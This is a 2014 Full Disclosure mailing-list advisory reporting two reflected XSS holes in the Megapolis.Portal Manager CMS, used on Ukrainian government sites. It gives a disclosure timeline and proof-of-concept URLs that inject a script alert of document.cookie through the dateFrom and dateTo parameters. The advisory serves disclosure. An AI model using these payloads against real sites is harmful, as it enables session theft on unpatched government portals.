Date: Thu, 16 Oct 2014 20:50:18 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] XSS vulnerabilities in Megapolis.Portal Manager

Hello list!

These are Cross-Site Scripting vulnerabilities in Megapolis.Portal Manager.

It's commercial CMS from Softline-IT (earlier Softline), which in
particularly widespread among Ukrainian government sites (including
ministry, parliament, two special services and many other web sites). In
2012 I already wrote about multiple vulnerabilities in Megapolis.Portal
Manager (http://securityvulns.ru/docs28651.html).

These particular vulnerabilities I found at zpd.gov.ua in 2012 and also at
dcz.gov.ua in 2014. Where I placed a statement to the President
http://on.fb.me/1sQ3vdq (screenshot and demonstration of the hole) to
dismiss current Minister of Defense. And the President took it into account,
dismissed him on Sunday and presented new Minister of Defense on Monday,
which was voted by parliament the next day.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Megapolis.Portal Manager.

Developer of Megapolis.Portal Manager declined to fix these vulnerabilities.

----------
Details:
----------

XSS (WASC-08):

http://site/control/uk/publish/category?dateFrom=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://site/control/uk/publish/category?dateTo=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

------------
Timeline:
------------

2012.07 - found multiple vulnerabilities at multiple government sites,
including web sites of ministry and parliament. In addition to all those
holes during 2006-2012.
2012.07 - informed admins of these sites.
2012.07.13 - announced at my site about holes in Megapolis.Portal Manager.
2012.07.16 - informed developers.
2012.07.16 - developers answered, that they don't care about these holes
(and so about all web sites on their CMS) and will not fix them.
2012.07.19 - I've disagreed with developers' position and suggest to not
decline the support of the government sites for which they were paid. Later
some holes were fixed, but not these two XSS.
2013.01.23 - disclosed holes at zpd.gov.ua (including these two ones).
2014.10.16 - disclosed these two holes at my site
(http://websecurity.com.ua/7398/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site